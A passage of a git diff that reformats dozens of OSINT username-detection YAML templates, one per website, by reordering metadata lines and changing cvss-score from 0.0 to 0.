CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,hashnode metadata: max-request: 1 + tags: osint,osint-social,hashnode self-contained: true + http: - method: GET path: diff --git a/http/osint/hcommonssocial-mastodon-instance.yaml b/http/osint/hcommonssocial-mastodon-instance.yaml index 29dce2a406..1974affeb1 100644 --- a/http/osint/hcommonssocial-mastodon-instance.yaml +++ b/http/osint/hcommonssocial-mastodon-instance.yaml @@ -3,17 +3,18 @@ id: hcommonssocial-mastodon-instance info: name: Hcommons.social (Mastodon Instance) User Name Information - Detect author: dwisiswant0 - description: Hcommons.social (Mastodon Instance) user name information check was conducted. severity: info + description: Hcommons.social (Mastodon Instance) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,hcommonssocial-mastodon-instance metadata: max-request: 1 + tags: osint,osint-social,hcommonssocial-mastodon-instance self-contained: true + http: - method: GET path: diff --git a/http/osint/heylink.yaml b/http/osint/heylink.yaml index adf42d5f75..b41178d922 100644 --- a/http/osint/heylink.yaml +++ b/http/osint/heylink.yaml @@ -3,17 +3,18 @@ id: heylink info: name: Heylink User Name Information - Detect author: dwisiswant0 - description: Heylink user name information check was conducted. severity: info + description: Heylink user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,heylink metadata: max-request: 1 + tags: osint,osint-misc,heylink self-contained: true + http: - method: GET path: diff --git a/http/osint/hiberworld.yaml b/http/osint/hiberworld.yaml index 7b2ae58257..a3bd13a75a 100644 --- a/http/osint/hiberworld.yaml +++ b/http/osint/hiberworld.yaml @@ -3,17 +3,18 @@ id: hiberworld info: name: Hiberworld User Name Information - Detect author: dwisiswant0 - description: Hiberworld user name information check was conducted. severity: info + description: Hiberworld user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,hiberworld metadata: max-request: 1 + tags: osint,osint-gaming,hiberworld self-contained: true + http: - method: GET path: diff --git a/http/osint/hihello.yaml b/http/osint/hihello.yaml index de524c0cf6..332d06a148 100644 --- a/http/osint/hihello.yaml +++ b/http/osint/hihello.yaml @@ -3,17 +3,18 @@ id: hihello info: name: HiHello User Name Information - Detect author: dwisiswant0 - description: HiHello user name information check was conducted. severity: info + description: HiHello user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-business,hihello metadata: max-request: 1 + tags: osint,osint-business,hihello self-contained: true + http: - method: GET path: diff --git a/http/osint/historianssocial-mastodon-instance.yaml b/http/osint/historianssocial-mastodon-instance.yaml index af57969cb5..64d31bcca4 100644 --- a/http/osint/historianssocial-mastodon-instance.yaml +++ b/http/osint/historianssocial-mastodon-instance.yaml @@ -3,17 +3,18 @@ id: historianssocial-mastodon-instance info: name: Historians.social (Mastodon Instance) User Name Information - Detect author: dwisiswant0 - description: Historians.social (Mastodon Instance) user name information check was conducted. severity: info + description: Historians.social (Mastodon Instance) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,historianssocial-mastodon-instance metadata: max-request: 1 + tags: osint,osint-social,historianssocial-mastodon-instance self-contained: true + http: - method: GET path: diff --git a/http/osint/homedesign3d.yaml b/http/osint/homedesign3d.yaml index 34246c3b17..79cd9cd5cc 100644 --- a/http/osint/homedesign3d.yaml +++ b/http/osint/homedesign3d.yaml @@ -3,17 +3,18 @@ id: homedesign3d info: name: HomeDesign3D User Name Information - Detect author: dwisiswant0 - description: HomeDesign3D user name information check was conducted. severity: info + description: HomeDesign3D user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,homedesign3d metadata: max-request: 1 + tags: osint,osint-hobby,homedesign3d self-contained: true + http: - method: GET path: diff --git a/http/osint/hometechsocial-mastodon-instance.yaml b/http/osint/hometechsocial-mastodon-instance.yaml index 51ca2355e4..1d52df8a58 100644 --- a/http/osint/hometechsocial-mastodon-instance.yaml +++ b/http/osint/hometechsocial-mastodon-instance.yaml @@ -3,17 +3,18 @@ id: hometechsocial-mastodon-instance info: name: Hometech.social (Mastodon Instance) User Name Information - Detect author: dwisiswant0 - description: Hometech.social (Mastodon Instance) user name information check was conducted. severity: info + description: Hometech.social (Mastodon Instance) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,hometechsocial-mastodon-instance metadata: max-request: 1 + tags: osint,osint-social,hometechsocial-mastodon-instance self-contained: true + http: - method: GET path: diff --git a/http/osint/hoobe.yaml b/http/osint/hoobe.yaml index da206bcece..9e63859dad 100644 --- a/http/osint/hoobe.yaml +++ b/http/osint/hoobe.yaml @@ -3,17 +3,18 @@ id: hoobe info: name: Hoo.be User Name Information - Detect author: dwisiswant0 - description: Hoo.be user name information check was conducted. severity: info + description: Hoo.be user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-business,hoobe metadata: max-request: 1 + tags: osint,osint-business,hoobe self-contained: true + http: - method: GET path: diff --git a/http/osint/hostuxsocial-mastodon-instance.yaml b/http/osint/hostuxsocial-mastodon-instance.yaml index 23adf63f20..c54b1c7a25 100644 --- a/http/osint/hostuxsocial-mastodon-instance.yaml +++ b/http/osint/hostuxsocial-mastodon-instance.yaml @@ -3,17 +3,18 @@ id: hostuxsocial-mastodon-instance info: name: Hostux.social (Mastodon Instance) User Name Information - Detect author: dwisiswant0 - description: Hostux.social (Mastodon Instance) user name information check was conducted. severity: info + description: Hostux.social (Mastodon Instance) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,hostuxsocial-mastodon-instance metadata: max-request: 1 + tags: osint,osint-social,hostuxsocial-mastodon-instance self-contained: true + http: - method: GET path: diff --git a/http/osint/houzz.yaml b/http/osint/houzz.yaml index 6efcbb9fb4..3ea8978d11 100644 --- a/http/osint/houzz.yaml +++ b/http/osint/houzz.yaml @@ -3,17 +3,18 @@ id: houzz info: name: Houzz User Name Information - Detect author: dwisiswant0 - description: Houzz user name information check was conducted. severity: info + description: Houzz user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,houzz metadata: max-request: 1 + tags: osint,osint-hobby,houzz self-contained: true + http: - method: GET path: diff --git a/http/osint/hubpages.yaml b/http/osint/hubpages.yaml index eddcf284bb..44847172a6 100644 --- a/http/osint/hubpages.yaml +++ b/http/osint/hubpages.yaml @@ -3,17 +3,18 @@ id: hubpages info: name: HubPages User Name Information - Detect author: dwisiswant0 - description: HubPages user name information check was conducted. severity: info + description: HubPages user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-blog,hubpages metadata: max-request: 1 + tags: osint,osint-blog,hubpages self-contained: true + http: - method: GET path: diff --git a/http/osint/hubski.yaml b/http/osint/hubski.yaml index 71f9d80955..aed44d16d1 100644 --- a/http/osint/hubski.yaml +++ b/http/osint/hubski.yaml @@ -3,17 +3,18 @@ id: hubski info: name: Hubski User Name Information - Detect author: dwisiswant0 - description: Hubski user name information check was conducted. severity: info + description: Hubski user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,hubski metadata: max-request: 1 + tags: osint,osint-social,hubski self-contained: true + http: - method: GET path: diff --git a/http/osint/hugging-face.yaml b/http/osint/hugging-face.yaml index 40ea5547d6..0e9f89666e 100644 --- a/http/osint/hugging-face.yaml +++ b/http/osint/hugging-face.yaml @@ -3,17 +3,18 @@ id: hugging-face info: name: Hugging face User Name Information - Detect author: dwisiswant0 - description: Hugging face user name information check was conducted. severity: info + description: Hugging face user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-tech,hugging-face metadata: max-request: 1 + tags: osint,osint-tech,hugging-face self-contained: true + http: - method: GET path: diff --git a/http/osint/iconfinder.yaml b/http/osint/iconfinder.yaml index 2b06deea2e..7671874723 100644 --- a/http/osint/iconfinder.yaml +++ b/http/osint/iconfinder.yaml @@ -3,17 +3,18 @@ id: iconfinder info: name: Iconfinder User Name Information - Detect author: dwisiswant0 - description: Iconfinder user name information check was conducted. severity: info + description: Iconfinder user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-images,iconfinder metadata: max-request: 1 + tags: osint,osint-images,iconfinder self-contained: true + http: - method: GET path: diff --git a/http/osint/icq-chat.yaml b/http/osint/icq-chat.yaml index 08502c4cff..769d2ac478 100644 --- a/http/osint/icq-chat.yaml +++ b/http/osint/icq-chat.yaml @@ -3,17 +3,18 @@ id: icq-chat info: name: Icq-chat User Name Information - Detect author: dwisiswant0 - description: Icq-chat user name information check was conducted. severity: info + description: Icq-chat user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,icq-chat metadata: max-request: 1 + tags: osint,osint-social,icq-chat self-contained: true + http: - method: GET path: diff --git a/http/osint/ifttt.yaml b/http/osint/ifttt.yaml index 68a692d192..83d87c3014 100644 --- a/http/osint/ifttt.yaml +++ b/http/osint/ifttt.yaml @@ -3,17 +3,18 @@ id: ifttt info: name: IFTTT User Name Information - Detect author: dwisiswant0 - description: IFTTT user name information check was conducted. severity: info + description: IFTTT user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,ifttt metadata: max-request: 1 + tags: osint,osint-misc,ifttt self-contained: true + http: - method: GET path: diff --git a/http/osint/ifunny.yaml b/http/osint/ifunny.yaml index abaaafc01c..cb09544d81 100644 --- a/http/osint/ifunny.yaml +++ b/http/osint/ifunny.yaml @@ -3,17 +3,18 @@ id: ifunny info: name: Ifunny User Name Information - Detect author: dwisiswant0 - description: Ifunny user name information check was conducted. severity: info + description: Ifunny user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,ifunny metadata: max-request: 1 + tags: osint,osint-misc,ifunny self-contained: true + http: - method: GET path: diff --git a/http/osint/igromania.yaml b/http/osint/igromania.yaml index 061df85029..a4c3fdc854 100644 --- a/http/osint/igromania.yaml +++ b/http/osint/igromania.yaml @@ -3,17 +3,18 @@ id: igromania info: name: Igromania User Name Information - Detect author: dwisiswant0 - description: Igromania user name information check was conducted. severity: info + description: Igromania user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,igromania metadata: max-request: 1 + tags: osint,osint-social,igromania self-contained: true + http: - method: GET path: diff --git a/http/osint/ilovegrowingmarijuana.yaml b/http/osint/ilovegrowingmarijuana.yaml index 29e2108ec0..67ca38532c 100644 --- a/http/osint/ilovegrowingmarijuana.yaml +++ b/http/osint/ilovegrowingmarijuana.yaml @@ -3,17 +3,18 @@ id: ilovegrowingmarijuana info: name: Ilovegrowingmarijuana User Name Information - Detect author: dwisiswant0 - description: Ilovegrowingmarijuana user name information check was conducted. severity: info + description: Ilovegrowingmarijuana user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,ilovegrowingmarijuana metadata: max-request: 1 + tags: osint,osint-social,ilovegrowingmarijuana self-contained: true + http: - method: GET path: diff --git a/http/osint/imagefap.yaml b/http/osint/imagefap.yaml index a6ebf29993..b666a034b4 100644 --- a/http/osint/imagefap.yaml +++ b/http/osint/imagefap.yaml @@ -3,17 +3,18 @@ id: imagefap info: name: Imagefap User Name Information - Detect author: dwisiswant0 - description: Imagefap user name information check was conducted. severity: info + description: Imagefap user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,imagefap metadata: max-request: 1 + tags: osint,osint-porn,imagefap self-contained: true + http: - method: GET path: diff --git a/http/osint/imageshack.yaml b/http/osint/imageshack.yaml index 4338ce9ea4..b2b654f70f 100644 --- a/http/osint/imageshack.yaml +++ b/http/osint/imageshack.yaml @@ -3,17 +3,18 @@ id: imageshack info: name: ImageShack User Name Information - Detect author: dwisiswant0 - description: ImageShack user name information check was conducted. severity: info + description: ImageShack user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-images,imageshack metadata: max-request: 1 + tags: osint,osint-images,imageshack self-contained: true + http: - method: GET path: diff --git a/http/osint/imgbb.yaml b/http/osint/imgbb.yaml index 929fea1ea7..7b10b79f20 100644 --- a/http/osint/imgbb.yaml +++ b/http/osint/imgbb.yaml @@ -7,13 +7,14 @@ info: description: ImgBB user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-image,imgbb metadata: max-request: 1 + tags: osint,osint-image,imgbb self-contained: true + http: - method: GET path: diff --git a/http/osint/imgsrcru.yaml b/http/osint/imgsrcru.yaml index e45ee479e2..8286f48576 100644 --- a/http/osint/imgsrcru.yaml +++ b/http/osint/imgsrcru.yaml @@ -3,17 +3,18 @@ id: imgsrcru info: name: IMGSRC.RU User Name Information - Detect author: dwisiswant0 - description: IMGSRC.RU user name information check was conducted. severity: info + description: IMGSRC.RU user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-images,imgsrcru metadata: max-request: 1 + tags: osint,osint-images,imgsrcru self-contained: true + http: - method: GET path: diff --git a/http/osint/imgur.yaml b/http/osint/imgur.yaml index 0537b90333..2193ad7724 100644 --- a/http/osint/imgur.yaml +++ b/http/osint/imgur.yaml @@ -3,17 +3,18 @@ id: imgur info: name: Imgur User Name Information - Detect author: dwisiswant0 - description: Imgur user name information check was conducted. severity: info + description: Imgur user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-images,imgur metadata: max-request: 1 + tags: osint,osint-images,imgur self-contained: true + http: - method: GET path: diff --git a/http/osint/inaturalist.yaml b/http/osint/inaturalist.yaml index 6dfe006614..f7ca1f3c4d 100644 --- a/http/osint/inaturalist.yaml +++ b/http/osint/inaturalist.yaml @@ -3,17 +3,18 @@ id: inaturalist info: name: Inaturalist User Name Information - Detect author: dwisiswant0 - description: Inaturalist user name information check was conducted. severity: info + description: Inaturalist user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,inaturalist metadata: max-request: 1 + tags: osint,osint-hobby,inaturalist self-contained: true + http: - method: GET path: diff --git a/http/osint/independent-academia.yaml b/http/osint/independent-academia.yaml index 42b18e6fa5..0597f3db37 100644 --- a/http/osint/independent-academia.yaml +++ b/http/osint/independent-academia.yaml @@ -3,17 +3,18 @@ id: independent-academia info: name: Independent academia User Name Information - Detect author: dwisiswant0 - description: Independent academia user name information check was conducted. severity: info + description: Independent academia user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,independent-academia metadata: max-request: 1 + tags: osint,osint-hobby,independent-academia self-contained: true + http: - method: GET path: diff --git a/http/osint/inkbunny.yaml b/http/osint/inkbunny.yaml index d7e79c84c4..c401c09791 100644 --- a/http/osint/inkbunny.yaml +++ b/http/osint/inkbunny.yaml @@ -3,17 +3,18 @@ id: inkbunny info: name: InkBunny User Name Information - Detect author: dwisiswant0 - description: InkBunny user name information check was conducted. severity: info + description: InkBunny user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,inkbunny metadata: max-request: 1 + tags: osint,osint-porn,inkbunny self-contained: true + http: - method: GET path: diff --git a/http/osint/insanejournal.yaml b/http/osint/insanejournal.yaml index eac1081449..e96470a75f 100644 --- a/http/osint/insanejournal.yaml +++ b/http/osint/insanejournal.yaml @@ -3,17 +3,18 @@ id: insanejournal info: name: InsaneJournal User Name Information - Detect author: dwisiswant0 - description: InsaneJournal user name information check was conducted. severity: info + description: InsaneJournal user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,insanejournal metadata: max-request: 1 + tags: osint,osint-social,insanejournal self-contained: true + http: - method: GET path: diff --git a/http/osint/instagram.yaml b/http/osint/instagram.yaml index fcde5aa26b..f646d6d4a2 100644 --- a/http/osint/instagram.yaml +++ b/http/osint/instagram.yaml @@ -3,17 +3,18 @@ id: instagram info: name: Instagram User Name Information - Detect author: dwisiswant0 - description: Instagram user name information check was conducted. severity: info + description: Instagram user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 tags: osint,osint-social,instagram self-contained: true + http: - method: GET path: @@ -21,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/osint/instructables.yaml b/http/osint/instructables.yaml index 8a41616354..ac114c53c4 100644 --- a/http/osint/instructables.yaml +++ b/http/osint/instructables.yaml @@ -3,17 +3,18 @@ id: instructables info: name: Instructables User Name Information - Detect author: dwisiswant0 - description: Instructables user name information check was conducted. severity: info + description: Instructables user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,instructables metadata: max-request: 1 + tags: osint,osint-hobby,instructables self-contained: true + http: - method: GET path: diff --git a/http/osint/internet-archive-account.yaml b/http/osint/internet-archive-account.yaml index 3d37587550..c5ac338c20 100644 --- a/http/osint/internet-archive-account.yaml +++ b/http/osint/internet-archive-account.yaml @@ -3,17 +3,18 @@ id: internet-archive-account info: name: Internet Archive Account User Name Information - Detect author: dwisiswant0 - description: Internet Archive Account user name information check was conducted. severity: info + description: Internet Archive Account user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,internet-archive-account metadata: max-request: 1 + tags: osint,osint-misc,internet-archive-account self-contained: true + http: - method: GET path: diff --git a/http/osint/internet-archive-user-search.yaml b/http/osint/internet-archive-user-search.yaml index 1d34e248fa..2afd1a1055 100644 --- a/http/osint/internet-archive-user-search.yaml +++ b/http/osint/internet-archive-user-search.yaml @@ -3,17 +3,18 @@ id: internet-archive-user-search info: name: Internet Archive User Search User Name Information - Detect author: dwisiswant0 - description: Internet Archive User Search user name information check was conducted. severity: info + description: Internet Archive User Search user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,internet-archive-user-search metadata: max-request: 1 + tags: osint,osint-misc,internet-archive-user-search self-contained: true + http: - method: GET path: diff --git a/http/osint/interpals.yaml b/http/osint/interpals.yaml index f3f81b9a93..4bcd3862c4 100644 --- a/http/osint/interpals.yaml +++ b/http/osint/interpals.yaml @@ -3,17 +3,18 @@ id: interpals info: name: Interpals User Name Information - Detect author: dwisiswant0 - description: Interpals user name information check was conducted. severity: info + description: Interpals user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-dating,interpals metadata: max-request: 1 + tags: osint,osint-dating,interpals self-contained: true + http: - method: GET path: diff --git a/http/osint/intigriti.yaml b/http/osint/intigriti.yaml index 89cc8d8099..acb5f75695 100644 --- a/http/osint/intigriti.yaml +++ b/http/osint/intigriti.yaml @@ -7,13 +7,14 @@ info: description: Intigriti user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 tags: osint,osint-tech,intigriti self-contained: true + http: - method: GET path: diff --git a/http/osint/ismygirl.yaml b/http/osint/ismygirl.yaml index 0de61b15da..d7fad1520f 100644 --- a/http/osint/ismygirl.yaml +++ b/http/osint/ismygirl.yaml @@ -3,17 +3,18 @@ id: ismygirl info: name: IsMyGirl User Name Information - Detect author: dwisiswant0 - description: IsMyGirl user name information check was conducted. severity: info + description: IsMyGirl user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-finance,ismygirl metadata: max-request: 1 + tags: osint,osint-finance,ismygirl self-contained: true + http: - method: GET path: diff --git a/http/osint/issuu.yaml b/http/osint/issuu.yaml index 72cfd02ba0..f9cc2e8238 100644 --- a/http/osint/issuu.yaml +++ b/http/osint/issuu.yaml @@ -3,17 +3,18 @@ id: issuu info: name: Issuu User Name Information - Detect author: dwisiswant0 - description: Issuu user name information check was conducted. severity: info + description: Issuu user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-shopping,issuu metadata: max-request: 1 + tags: osint,osint-shopping,issuu self-contained: true + http: - method: GET path: diff --git a/http/osint/itchio.yaml b/http/osint/itchio.yaml index 2fdaa74c86..85decf877e 100644 --- a/http/osint/itchio.yaml +++ b/http/osint/itchio.yaml @@ -3,17 +3,18 @@ id: itchio info: name: Itch.io User Name Information - Detect author: dwisiswant0 - description: Itch.io user name information check was conducted. severity: info + description: Itch.io user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,itchio metadata: max-request: 1 + tags: osint,osint-gaming,itchio self-contained: true + http: - method: GET path: diff --git a/http/osint/japandict.yaml b/http/osint/japandict.yaml index 20f90509ad..e2f9da440c 100644 --- a/http/osint/japandict.yaml +++ b/http/osint/japandict.yaml @@ -3,17 +3,18 @@ id: japandict info: name: Japandict User Name Information - Detect author: dwisiswant0 - description: Japandict user name information check was conducted. severity: info + description: Japandict user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,japandict metadata: max-request: 1 + tags: osint,osint-social,japandict self-contained: true + http: - method: GET path: diff --git a/http/osint/jbzd.yaml b/http/osint/jbzd.yaml index f5e9381c7b..c9f1b9e378 100644 --- a/http/osint/jbzd.yaml +++ b/http/osint/jbzd.yaml @@ -3,17 +3,18 @@ id: jbzd info: name: JBZD User Name Information - Detect author: dwisiswant0 - description: JBZD user name information check was conducted. severity: info + description: JBZD user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-images,jbzd metadata: max-request: 1 + tags: osint,osint-images,jbzd self-contained: true + http: - method: GET path: diff --git a/http/osint/jejapl.yaml b/http/osint/jejapl.yaml index 20f8d39228..a8785e60fd 100644 --- a/http/osint/jejapl.yaml +++ b/http/osint/jejapl.yaml @@ -3,17 +3,18 @@ id: jejapl info: name: Jeja.pl User Name Information - Detect author: dwisiswant0 - description: Jeja.pl user name information check was conducted. severity: info + description: Jeja.pl user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,jejapl metadata: max-request: 1 + tags: osint,osint-misc,jejapl self-contained: true + http: - method: GET path: diff --git a/http/osint/jeuxvideo.yaml b/http/osint/jeuxvideo.yaml index bf6bb9109c..9e6b68265c 100644 --- a/http/osint/jeuxvideo.yaml +++ b/http/osint/jeuxvideo.yaml @@ -3,17 +3,18 @@ id: jeuxvideo info: name: Jeuxvideo User Name Information - Detect author: dwisiswant0 - description: Jeuxvideo user name information check was conducted. severity: info + description: Jeuxvideo user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,jeuxvideo metadata: max-request: 1 + tags: osint,osint-gaming,jeuxvideo self-contained: true + http: - method: GET path: diff --git a/http/osint/joe-monster.yaml b/http/osint/joe-monster.yaml index 036c8407dd..8e3f1f9000 100644 --- a/http/osint/joe-monster.yaml +++ b/http/osint/joe-monster.yaml @@ -3,17 +3,18 @@ id: joe-monster info: name: Joe Monster User Name Information - Detect author: dwisiswant0 - description: Joe Monster user name information check was conducted. severity: info + description: Joe Monster user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,joe-monster metadata: max-request: 1 + tags: osint,osint-misc,joe-monster self-contained: true + http: - method: GET path: diff --git a/http/osint/jsfiddle.yaml b/http/osint/jsfiddle.yaml index 116d2806d8..d123230e96 100644 --- a/http/osint/jsfiddle.yaml +++ b/http/osint/jsfiddle.yaml @@ -3,17 +3,18 @@ id: jsfiddle info: name: JSFiddle User Name Information - Detect author: dwisiswant0 - description: JSFiddle user name information check was conducted. severity: info + description: JSFiddle user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-coding,jsfiddle metadata: max-request: 1 + tags: osint,osint-coding,jsfiddle self-contained: true + http: - method: GET path: diff --git a/http/osint/justforfans.yaml b/http/osint/justforfans.yaml index d389396d2c..993b606a6e 100644 --- a/http/osint/justforfans.yaml +++ b/http/osint/justforfans.yaml @@ -3,17 +3,18 @@ id: justforfans info: name: Justforfans User Name Information - Detect author: dwisiswant0 - description: Justforfans user name information check was conducted. severity: info + description: Justforfans user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: 